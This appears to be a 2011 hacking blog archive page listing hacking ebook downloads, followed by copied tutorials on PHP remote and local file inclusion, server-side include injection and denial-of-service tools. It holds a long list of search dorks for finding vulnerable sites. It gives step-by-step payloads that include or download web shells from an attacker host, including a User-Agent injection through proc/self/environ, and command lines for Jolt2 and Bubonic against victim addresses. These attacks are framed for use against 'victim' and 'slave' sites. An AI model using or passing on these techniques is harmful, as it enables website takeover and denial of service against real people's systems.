Archive for June 2011

Unix Network Programming

Download

Comments : 0

Posted :

Tag : Ebooks,

RedHat System Administrator

Download

Comments : 0

Posted :

Tag : Ebooks,

Network Security Hacks

Download

Comments : 0

Posted :

Tag : Ebooks,

Linux - Complete Command Reference

Download

Comments : 0

Posted :

Tag : Ebooks,

Home Wireless Networking In A Snap

Download

Comments : 0

Posted :

Tag : Ebooks,

Hardcode Windows XP

Download

Comments : 0

Posted :

Tag : Ebooks,

Hacking Windows XP

Download

Comments : 0

Posted :

Tag : Ebooks,

Hacking The Art of Exploitation 2

Download

Comments : 0

Posted :

Tag : Ebooks,

Hacking Gmail

Download

Comments : 0

Posted :

Tag : Ebooks,

Dictionary Of Networking

Download

Comments : 0

Posted :

Tag : Ebooks,

Batch File Programming

Download

Comments : 0

Posted :

Tag : Ebooks,

Hacking for Dummies

Download

Comments : 0

Posted :

Tag : Ebooks,

The Hacker's Underground HandBook

Download

Comments : 0

Posted :

Tag : Ebooks,

[TuT] RFI - Remote File Inclusion.

What is RFI?
RFI is a very uncommon vulnerability due to excessive patches and updates on websites. You will be very lucky to find a vulnerable site. Nevertheless, there are still vulnerable websites, many users of HackForums have dorks for searching for RFI vulnerable websites, as well as having lists of RFI vulnerable websites. RFI, also known as Remote File Inclusion is exactly what it's name is. You include a file onto the website remotely.

What makes a page vulnerable?
A PHP include script looks like this.

include($_GET['p']

?>

Since the code uses 'p' the syntax would be:

http://victimsite.com/index.php?[b]p[/b]=URL_TO_SHELL.txt?

If the script looks like this:

include($_GET['lulz']);

?>

The syntax would then be:

http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

Understood?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:

inurl:/modules/My_eGallery/public/displayCategory.php?basepath=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/include/new-visitor.inc.php?lvc_include_dir=

inurl:/_functions.php?prefix=

inurl:/cpcommerce/_functions.php?prefix=

inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/ashnews.php?pathtoashnews=

inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=

inurl:/pm/lib.inc.php?pm_path=

inurl:/b2-tools/gm-2-b2.php?b2inc=

inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=

inurl:/modules/agendax/addevent.inc.php?agendax_path=

inurl:/includes/include_once.php?include_file=

inurl:/e107/e107_handlers/secure_img_render.php?p=

inurl:/shoutbox/expanded.php?conf=

inurl:/main.php?x=

inurl:/myPHPCalendar/admin.php?cal_dir=

inurl:/index.php/main.php?x=

inurl:/index.php?include=

inurl:/index.php?x=

inurl:/index.php?open=

inurl:/index.php?visualizar=

inurl:/template.php?pagina=

inurl:/index.php?pagina=

inurl:/index.php?inc=

inurl:/includes/include_onde.php?include_file=

inurl:/index.php?page=

inurl:/index.php?pg=

inurl:/index.php?show=

inurl:/index.php?cat=

inurl:/index.php?file=

inurl:/db.php?path_local=

inurl:/index.php?site=

inurl:/htmltonuke.php?filnavn=

inurl:/livehelp/inc/pipe.php?HCL_path=

inurl:/hcl/inc/pipe.php?HCL_path=

inurl:/inc/pipe.php?HCL_path=

inurl:/support/faq/inc/pipe.php?HCL_path=

inurl:/help/faq/inc/pipe.php?HCL_path=

inurl:/helpcenter/inc/pipe.php?HCL_path=

inurl:/live-support/inc/pipe.php?HCL_path=

inurl:/gnu3/index.php?doc=

inurl:/gnu/index.php?doc=

inurl:/phpgwapi/setup/tables_update.inc.php?appdir=

inurl:/forum/install.php?phpbb_root_dir=

inurl:/includes/calendar.php?phpc_root_path=

inurl:/includes/setup.php?phpc_root_path=

inurl:/inc/authform.inc.php?path_pre=

inurl:/include/authform.inc.php?path_pre=

inurl:index.php?nic=

inurl:index.php?sec=

inurl:index.php?content=

inurl:index.php?link=

inurl:index.php?filename=

inurl:index.php?dir=

inurl:index.php?document=

inurl:index.php?view=

inurl:*.php?sel=

inurl:*.php?session=&content=

inurl:*.php?locate=

inurl:*.php?place=

inurl:*.php?layout=

inurl:*.php?go=

inurl:*.php?catch=

inurl:*.php?mode=

inurl:*.php?name=

inurl:*.php?loc=

inurl:*.php?f=

inurl:*.php?inf=

inurl:*.php?pg=

inurl:*.php?load=

inurl:*.php?naam=

allinurl:/index.php?page= site:*.dk

allinurl:/index.php?file= site:*.dk

INURL OR ALLINURL WITH:

/temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=

/includes/header.php?systempath=

/Gallery/displayCategory.php?basepath=

/index.inc.php?PATH_Includes=

/ashnews.php?pathtoashnews=

/ashheadlines.php?pathtoashnews=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/demo/includes/init.php?user_inc=

/jaf/index.php?show=

/inc/shows.inc.php?cutepath=

/poll/admin/common.inc.php?base_path=

/pollvote/pollvote.php?pollname=

/sources/post.php?fil_config=

/modules/My_eGallery/public/displayCategory.php?basepath=

/bb_lib/checkdb.inc.php?libpach=

/include/livre_include.php?no_connect=lol&chem_absolu=

/index.php?from_market=Y&pageurl=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/pivot/modules/module_db.php?pivot_path=

/modules/4nAlbum/public/displayCategory.php?basepath=

/derniers_commentaires.php?rep=

/modules/coppermine/themes/default/theme.php?THEME_DIR=

/modules/coppermine/include/init.inc.php?CPG_M_DIR=

/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=

/coppermine/themes/maze/theme.php?THEME_DIR=

/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=

/myPHPCalendar/admin.php?cal_dir=

/agendax/addevent.inc.php?agendax_path=

/modules/mod_mainmenu.php?mosConfig_absolute_path=

/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=

/main.php?page=

/default.php?page=

/index.php?action=

/index1.php?p=

/index2.php?x=

/index2.php?content=

/index.php?conteudo=

/index.php?cat=

/include/new-visitor.inc.php?lvc_include_dir=

/modules/agendax/addevent.inc.php?agendax_path=

/shoutbox/expanded.php?conf=

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

/pivot/modules/module_db.php?pivot_path=

/library/editor/editor.php?root=

/library/lib.php?root=

/e107/e107_handlers/secure_img_render.php?p=

/zentrack/index.php?configFile=

/main.php?x=

/becommunity/community/index.php?pageurl=

/GradeMap/index.php?page=

/index4.php?body=

/side/index.php?side=

/main.php?page=

/es/index.php?action=

/index.php?sec=

/index.php?main=

/index.php?sec=

/index.php?menu=

/html/page.php?page=

/page.php?view=

/index.php?menu=

/main.php?view=

/index.php?page=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/content.php?page=

/main.php?page=

/index.php?x=

/main_site.php?page=

/index.php?L2=

/index.php?show=

/tutorials/print.php?page=

/index.php?page=

/index.php?level=

/index.php?file=

/index.php?inter_url=

/index.php?page=

/index2.php?menu=

/index.php?level=

/index1.php?main=

/index1.php?nav=

/index1.php?link=

/index2.php?page=

/index.php?myContent=

/index.php?TWC=

/index.php?sec=

/index1.php?main=

/index2.php?page=

/index.php?babInstallPath=

/main.php?body=

/index.php?z=

/main.php?view=

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

/index.php?file=

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

1. allinurl:my_egallery site:.org

/modules/My_eGallery/public/displayCategory.php?basepath=

2. allinurl:xgallery site:.org

/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=

3. allinurl:coppermine site:.org

/modules/coppermine/themes/default/theme.php?THEME_DIR=

4. allinurl:4nAlbum site:.org

/modules/4nAlbum/public/displayCategory.php?basepath=

5. allinurlP:NphpBB2 site:.org

/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

6. allinurl:ihm.php?p=

7. Keyword : "powered by AllMyLinks"

/include/footer.inc.php?_AMLconfig[cfg_serverpath]=

8. allinurl:/modules.php?name=allmyguests

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

9. allinurl:/Popper/index.php?

/Popper/index.php?childwindow.inc.php?form=

10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php

yahoo = by Kietu? v 3.2

/kietu/index.php?kietu[url_hit]=

11. keyword : "Powered by phpBB 2.0.6"

/html&highlight=%2527.include($_GET[a]),exit.%2527&a=

12. keyword : "powered by CubeCart 3.0.6"

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

13. keyword : "powered by paBugs 2.0 Beta 3"

/class.mysql.php?path_to_bt_dir=

14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php

/ashnews.php?pathtoashnews=

15. keyword : /phorum/login.php

/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

16. allinurl:ihm.php?p=*

14. keyword : "powered eyeOs"

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id

diganti dengan :

/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. allinurl:.php?bodyfile=

16. allinurl:/includes/orderSuccess.inc.php?glob=

/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

17. allinurl:forums.html

/modules.php?name=

18. allinurl:/default.php?page=home

19. allinurl:/folder.php?id=

20. allinurl:main.php?pagina=

/paginedinamiche/main.php?pagina=

21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( 
allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by 
AllMyGuests")

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

22. allinurl:application.php?base_path=

/application.php?base_path=

23. allinurlp:hplivehelper

/phplivehelper/initiate.php?abs_path=

24. allinurlp:hpnuke

/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=

25. key word : "powered by Fantastic News v2.1.2"

/archive.php?CONFIG[script_path]=

26. keyword: "powered by smartblog" AND inurl:?page=login

/index.php?page=

27. allinurl:/forum/

/forum/admin/index.php?inc_conf=

28. keyword:"Powered By FusionPHP"

/templates/headline_temp.php?nst_inc=

29. allinurl:shoutbox/expanded.php filetypep:hp

/shoutbox/expanded.php?conf=

30. allinurl: /osticket/

/osticket/include/main.php?config[search_disp]=true&include_dir=

31. keyword : "Powered by iUser"

/common.php?include_path=

32. allinurl: "static.php?load="

/static.php?load=

33. keyworld : /phpcoin/login.php

/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

34. keyworld: allinurl:/phpGedview/login.php site:

/help_text_vars.php?dir&PGV_BASE_DIRECTORY=

35. allinurl:/folder.php?id=

/classes.php?LOCAL_PATH=

inurl:"/lire.php?rub="

inurl:"/os/pointer.php?url="

inurl:"folder.php?id="

inurl:"show.php?page="

inurl:"index2.php?DoAction="

inurl:"index.php?canal="

inurl:"index.php?screen="

inurl:"index.php?langc="

inurl:"index.php?Language="

inurl:"view.php?page="

dork: "powered by doodle cart"

rfi of this dork: enc/content.php?Home_Path=

dork: "Login to Calendar"

rfi of this dork: /embed/day.php?path=

dork: "powered by EQdkp"

rfi of this dork: /includes/dbal.php?eqdkp_root_path=

inurl:"template.php?goto="

inurl:"video.php?content="

inurl:"pages.php?page="

inurl:"index1.php?choix="

inurl:"index1.php?menu="

inurl:"index2.php?ascii_seite="

dork: inurl:surveys

rfi to this dork: /surveys/survey.inc.php?path=

inurl:"index.php?body="

dork: allinurl:adobt sitel

rfi to this dork: /classes/adodbt/sql.php?classes_dir=

dork: "Powered By ScozNews"

rfi to this dork: /sources/functions.php?CONFIG[main_path]=

rfi to this dork: /sources/template.php?CONFIG[main_path]=

inurl:"kb_constants.php?module_root_path="

dork: allinurl:"mcf.php"

rfi to this dork: /mcf.php?content=

dork: inurl:"main.php?sayfa="

rfi to this dork: /main.php?sayfa=

dork: "MobilePublisherPHP"

rfi to this dork: /header.php?abspath=

dork: "powered by phpCOIN 1.2.3"

rfi to rhis dork: /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=

allinurl:login.php?dir=

inurl:"index.php?go="

inurl:"index1.php?="

inurl:"lib/gore.php?libpath="

inurl:"index2.php?p="

Exploit scanners: http://www.youtube.com/v/f6SOzynrWx4

We've got our target, how do we exploit this vulnerability?
Testing the vulnerability is basically exploiting the vulnerability. So we will be testing as well as finishing up.
What you have to do is go to your vulnerable website. In this case I will be making a website up for demonstration.

http://victimsite.com/index.php?p=interview.php

As you can see above there is a file attached to the index.php file. In this case it is "interview.php". Most of the time there will have to be a file at the end of the URL, just like this one. Since we're including a file there has to be something to replace it with.

Tweaking and exploiting.
So now we want to tweak this to our advantage. This is rather simple.

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

http://yoursite.com/shell.txt

Including our shell to our slave's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" and include our own file.
Our new link should look like this.

http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?

The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?%00".

I hope this helps. Happy hacking. Credit Goes To PHIZO

Comments : 0

Posted :

Tag : Tricks And Tutorials,

SSI (Server Side Inclusion)

1- What is It?

A Server Side Include Attack is an Extremely Useful attack for executing commands on the server. You need basic knowledge of Bash or Batch to know what commands could help compromise the server to do this.

2- What Sites are Vulnerable?

For a site to be vulnerable to SSI Injection, Apache needs Server Side Includes aloud in the config file or the file extention must end in ‘.shtml’ ‘.shtm’ or ‘.stm’ both Apache, lighthttpd and IIS support SSI.

3- Testing for SSI Injection

To audit a site to check if it is vulnerable to SSI Injection you search all the directories for ‘.shtml’ ‘.shtm’ or ‘.stm’ extentions, if you find any then its probably enabled, if you dont find any it still may be enabled. It effects pages with unsanitized requests, (eg no filters, filtering < !–#exec …–>) To test you enter the following command into the request

< !–#exec cmd=”ls” –>

If you get a filesystem output appear then it is vulnerable, if the server is Windows replace the ‘ls’ for ‘dir’
You test for SSI the same way as XSS, you can post the command into
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar

4- Useful Commands

-Show Files Linux

< !–#exec cmd=”ls” –>

-Show Files Windows

< !–#exec cmd=”dir” –>

-Read /etc/passwd

-What User Is the webserver running on

< !–#exec cmd=”whoami” –>

-Download a shell to the server to get full control

< !–#exec cmd=”wget “shell.php”” –>

5- Dorks

Simillar to SQLi dorks, they get a list of sites that may or may not be vulnerable to SSI Injection
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Theres a few to start you off, but it is easy as pie to think of your own.

Comments : 4

Posted :

Tag : Tricks And Tutorials,

LFI (Local File Inclusion) TuTorial Proc Self Environ

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

www.website.com/view.php?page=../

and we got an error

Code:


Warning: include(../) 
[function.include]: failed to open stream: No such file or directory in 
/home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let’s go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) 
[function.include]: failed to open stream: No such file or directory in 
/home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash 
bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin
 adm:x:3:4:adm:/var/adm:/sbin/nologin 
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
 shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown 
halt:x:7:0:halt:/sbin:/sbin/halt 
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin 
news:x:9:13:news:/etc/news: 
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin 
operator:x:11:0:operator:/root:/sbin/nologin 
games:x:12:100:games:/usr/games:/sbin/nologin 
test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP 
User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html
 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9,
 application/xhtml+xml, image/png, image/jpeg, image/gif, 
image/x-xbitmap, */*;q=0.1 
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac 
HTTP_HOST=www.website.com 
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
 HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 
Version/10.00 PATH=/bin:/usr/bin 
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron 
REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 
REQUEST_METHOD=GET 
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
 SCRIPT_FILENAME=/home/sirgod/public_html/index.php 
SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x 
SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com 
SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=

Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server 
at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in User-Agent filed write the following code :

{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

www.website.com/shell.php

Our shell is there.Injection was succesfully.

Comments : 0

Posted :

Tag : Tricks And Tutorials,

Dos Attack And Hacking Toolst

Hacking Tool: SSPing

SSPing is a DoS tool.
SSPing program sends the victim’s computer a series of highly fragmented, oversized ICMP data packets.
The computer receiving the data packets lock when it tries to put the fragments together.
The result is a memory overflow which in turn causes the machine to stop responding.
Affects Win 95/NT and Mac OS

SSPING is a program that can freeze any computer connected to the Internet or on a network running Windows 95, Windows NT, and older versions of the Mac OS that are not behind a firewall that blocks ICMP (Internet Control Message Protocol) data packets. The SSPING program sends the victim’s computer a series of highly fragmented, oversized ICMP data packets over the connection. The computer receiving the data packets locks when it tries to put the fragments together. Usually, the attacker only needs to send a few packets, locking the victim’s computer instantaneously. When the victim restarts his or her computer, the connection with the attacker is lost and the attacker remains anonymous.

Jolt is a program, which effectively freezes some Windows 95 or Windows NT machines. It is based on old code, which freezes old SysV and Posix implementations. Jolt works by sending a series of spoofed & highly fragmented ICMP packets to the target, which then tries to reassemble the received fragments. As a result, of Jolt Windows 95/NT ceases to function altogether.
This will affect unpatched Windows 95, Memphis and Windows NT machines, which are not behind a firewall that blocks ICMP packets. This will also affect old MacOS machines, and it is possible it is also useful against old SysV/POSIX implementations.

Hacking Tool: Land Exploit

Land Exploit is a DoS attack in which a program sends a TCP SYN packet where the target and source addresses are the same and port numbers are the same.
When an attacker wants to attack a machine using the land exploit, he sends a packet in which the source/destination ports are the same.
Most machines will crash or hang because they do not know how to handle it.

The Land Exploit Denial of Service attack works by sending a spoofed packet with the SYN flag – used in a “handshake” between a client and a host – set from a host to any port that is open and listening. If the packet is programmed to have the same destination and source IP address, when it is sent to a machine, via IP spoofing, the transmission can fool the machine into thinking it is sending itself a message, which, depending on the operating system, will crash the machine.

After receiving spoofed connection request (SYN) packets over TCP/IP, a computer running Windows 95 or Windows NT may begin to operate slowly. After about one minute, Windows returns to normal operation. Variations of this attack can cause any Windows PC to stop responding. (hang)
This behavior occurs due to “Land Attack.” Land Attack sends SYN packets with the same source and destination IP addresses and the same source and destination ports to a host computer. This makes it appear as if the host computer sent the packets to itself. Windows 95 and Windows NT operate slowly while the host computer tries to respond to itself.

Hacking Tool: Smurf

Smurf is a DoS attack involving forged ICMP packets sent to a broadcast address.
Attackers spoof the source address on ICMP echo requests and sending them to an IP broadcast address. This causes every machine on the broadcast network to receive the reply and respond back to the source address that was forged by the attacker.
1. An attacker starts a forged ICMP packet-source address with broadcast as the destination.
2. All the machines on the segment receives the broadcast and replies to the forged source address.
3. This results in DoS due to high network traffic.

Smurf is a simple yet effective DDoS attack technique that takes advantage of the ICMP (Internet Control Message Protocol). ICMP is normally used on the internet for error handling and for passing control messages. One of its capabilities is to contact a host to see if it is “up” by sending an “echo request” packet. The common “ping” program uses this functionality. Smurf is installed on a computer using a stolen account, and then continuously “pings” one or more networks of computers using a forged source address. This causes all the computers to respond to a different computer than actually sent the packet. The forged source address, which is the actual target of the attack, is then overwhelmed by response traffic. The computer networks that respond to the forged (“spoofed”) packet serve as unwitting accomplices to the attack.

The “smurf” attack, named after its exploit program, is one in the category of network-level attacks against hosts. A perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast addresses, all of it having a spoofed source address of a victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, there could potentially be hundreds of machines to reply to each packet.

The “smurf” attack’s cousin is called “fraggle”, which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of “smurf”. There are two parties who are hurt by this attack… the intermediary (broadcast) devices–let’s call them “amplifiers”, and the spoofed address target, or the “victim”. The victim is the target of a large amount of traffic that the amplifiers generate.
Let’s look at a scenario to see the nature of this attack. Assume a co-location switched network with 250 hosts, and that the attacker has a T1. The attacker sends, say, a 234b/s stream of ICMP echo (ping) packets, with a spoofed source address of the victim, to the broadcast address of the “bounce site”. These ping packets hit the bounce site’s broadcast network of 250 hosts; each of them takes the packet and responds to it, creating 250 ping replies out-bound. If you multiply the bandwidth, 58.5 Mbps is used outbound from the “bounce site” after the traffic is multiplied. This is then sent to the victim (the spoofed source of the originating packets). The perpetrators of these attacks rely on the ability to source spoofed packets to the “amplifiers” in order to generate the traffic which causes the denial of service.
In the case of the smurf or fraggle attack, each host which supports this behavior on a broadcast LAN will happily reply with an ICMP or UDP (smurf or fraggle, respectively) echo-reply packet toward the spoofed source address, the victim. The amount of bandwidth and packets per second (pps) that can be generated by this attack is quite large. Many hosts cannot process this many packets per second; many hosts are connected to 10 Mbps Ethernet LANs where more traffic than wire speed is sent. Therefore, the ability to drop these packets at the network border, or even before it flows down the ingress pipes, is desired.

SYN Flood

SYN attack floods a targeted system with a series of SYN packets.
Each packet causes the targeted system to issue a SYN-ACK response, while the targeted system waits for the ACK that follows the SYN-ACK, it queues up all outstanding SYN-ACK responses on what is known as a backlog queue.
SYN-ACKs are moved of the queue only when an ACK comes back or when an internal timer (which is set at relatively long intervals) terminates the TCP three-way handshake
Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for legitimate users.

Concept

The connectionless TCP attack does not complete the three-way handshake initiated by the originator. Thus, often the packet is crafted with nonexistent (spoofed) source IP. For a connectionless TCP attack, it is more difficult to filter since the source address is not necessarily the original source IP of the packet. When the host fails to find the source IP, it will wait until it times out. The most effective way of stopping such attacks is by applying rate limit. Rate limit is a method of setting threshold to an acceptable number of packets to be processed by the computer.

Concept

One of the most common attacks that will appear on many Intruder Detection System alerts is TCP SYN flood alerts. TCP SYN flood attacks are instigated by crafting packets from spoofed or non-existent source address and generating a high number of half-open connections. Because each connection opened must be processed to its completion (to complete the handshake or eventual timeout), the system is pinned down to perform these tasks. This problem is inherent in any network or operating system running full-fledged TCP/IP design and something that is not easily rectified.

Countermeasure

Network Ingress filtering can also prevent their downstream networks from injecting packets with faked or “spoofed” addressed into the Internet. Although it may not stop the attack, it will make identifying the source host easier and terminate it immediately. RFC 2267 [1] provides more information on Ingress Filtering.

In the TCP/IP protocol, a three-way handshake takes place as a service is connected to. First in a SYN packet from the client, with which the service responses with a SYN-ACK. Finally, the client responds to the SYN-ACK and the conversation is considered started.
A SYN Flood attack is when the client does not response to the SYN-ACK, tying up the service until the service times out, and continues to send SYN packets. The source address of the client is forged to a non-existent host, and as long as the SYN packets are sent faster than the timeout rate of the TCP stack waiting for the time out, the resources of the service will be tied up.
This is a simplified version of what exactly happens. During a SYN flood attack, the attacker sends a large number of SYN packets alone, without the corresponding ACK packet response to the victim’s SYN/ACK packets. The victim’s connections table rapidly fills with incomplete connections, crowding out the legitimate traffic. Because the rate of attacking SYN packets usually far exceeds that of normal traffic, even when a table entry eventually is cleared out, another attacking SYN packet rather than a legitimate connection will fill it.
But because SYN packets are a necessary part of legitimate traffic, they cannot be filtered out altogether. Second, SYN packets are relatively small, so an attacker can send large numbers of packets using relatively low-bandwidth Internet connections. Finally, because the attacker does not need to receive any data from the victim, the attacker can place random source IP addresses in the attacking packets to camouflage the actual source of the attack, and make filtering all but impossible.

The basic purpose of a SYN flood is to use up all new network connections at a site and thus prevent legal users from being able to connect. TCP connections are made by first sending a request to connect with an ID in it. The receiving connection sends out an acknowledgment saying it’s ready and then the sending system is supposed to send an acknowledgment that the connection has been made. The SYN (Synchronize sequence Number) packet is the first of these and contains the ID the receiver is supposed to reply to. If a fake ID is in that packet then the receiving system never gets a connection acknowledgment. Eventually, the connection will time out and that incoming channel on the receiver will become available again for another request. A SYN flood sends so many such requests that all incoming connections be continuously tied up waiting for acknowledgments that never come. This makes the server generally unavailable to legal users (unless one happens to sneak in just at the moment one of the tied-up connections times out).

Hacking Tool: WinNuke

WinNuke works by sending a packet with “Out of band” data to port 139 of the target host. First off, port 139 is the NetBIOS port and does not accept packets unless the flag OOB is set in incoming packet.
The OOB stands for Out Of Band. When the victim’s machine accepts this packet, it causes the computer to crash a blue screen.
Because the program accepting the packets does not know how to appropriately handle Out Of Band data, it crashes.

A “blue bomb” (also known as “WinNuke”) is a technique for causing the Windows operating system of someone you are communicating with to crash or suddenly terminate. The “blue bomb” is actually an out-of-band network packet containing information that the operating system cannot process. This condition causes the operating system to “crash” or terminate prematurely. The operating system can usually be restarted without any permanent damage other than possible loss of unsaved data when you crashed.

The blue bomb derives its name from the effect it sometimes causes on the display as the operating system is terminating – a white-on-blue error screen that is commonly known as blue screen of death. Blue bombs are sometimes sent by multi-player game participants who are about to lose or users of Internet Relay Chat (IRC) who are making a final comment. This is known as “nuking” someone. A commonly used program for causing the blue bomb is WinNuke. Many Internet service providers are filtering out the packets so they do not reach users.

The WinNuke attack sends OOB (Out-of-Band) data to an IP address of a Windows machine connected to a network and/or Internet. Usually, the WinNuke program connects via port 139, but other ports are vulnerable if they are open. When a Windows machine receives the out-of-band data, it is unable to handle it and exhibits odd behavior, ranging from a lost Internet connection to a system crash (resulting in the infamous Blue Screen of Death).

WinNuke is practically an outdated attack. All the new Windows versions are immune to WinNuke.

Hacking Tool: Jolt2

Jolt2 enables users across different networks to send IP fragment-driven denial of service attacks against NT/2000 by making victim’s machine utilize 100% of its CPU when it attempts to process the illegal packets.
```
c: \> jolt2 1.2.3.4 -p 80 4.5.6.7
```
The above command launches the attack from the attacker’s machine with a spoofed IP address of 1.2.3.4 against the IP address 4.5.6.7
The victim’s machine CPU resources reach 100% causing the machine to lock up.

Sending large numbers of identical fragmented IP packets to a Windows 2000 or NT4 host may cause the target to lock-up for the duration of the attack. The CPU utilization on the target goes to 100% for the duration of the attack. This causes both the UI and network interfaces to lock up.

Jolt2 enables users across different networks to send IP fragment-driven denial of service attacks against NT/2000 by making victim’s machine utilize 100% of its CPU when it attempts to process the illegal packets.
Usage:

c: \> jolt2 1.2.3.4 -p 80 4.5.6.7

The above command launches the attack from the attacker’s machine with a spoofed IP address of 1.2.3.4 against the IP address 4.5.6.7
The victim’s machine CPU resources reach 100% causing the machine to lock up.

Hacking Tool: Bubonic.c

Bubonic.c is a DOS exploit that can be run against Windows 2000 machines.
It works by randomly sending TCP packets with random settings with the goal of increasing the load of the machine, so that it eventually crashes.
```
c: \> bubonic 12.23.23.2 10.0.0.1 100
```

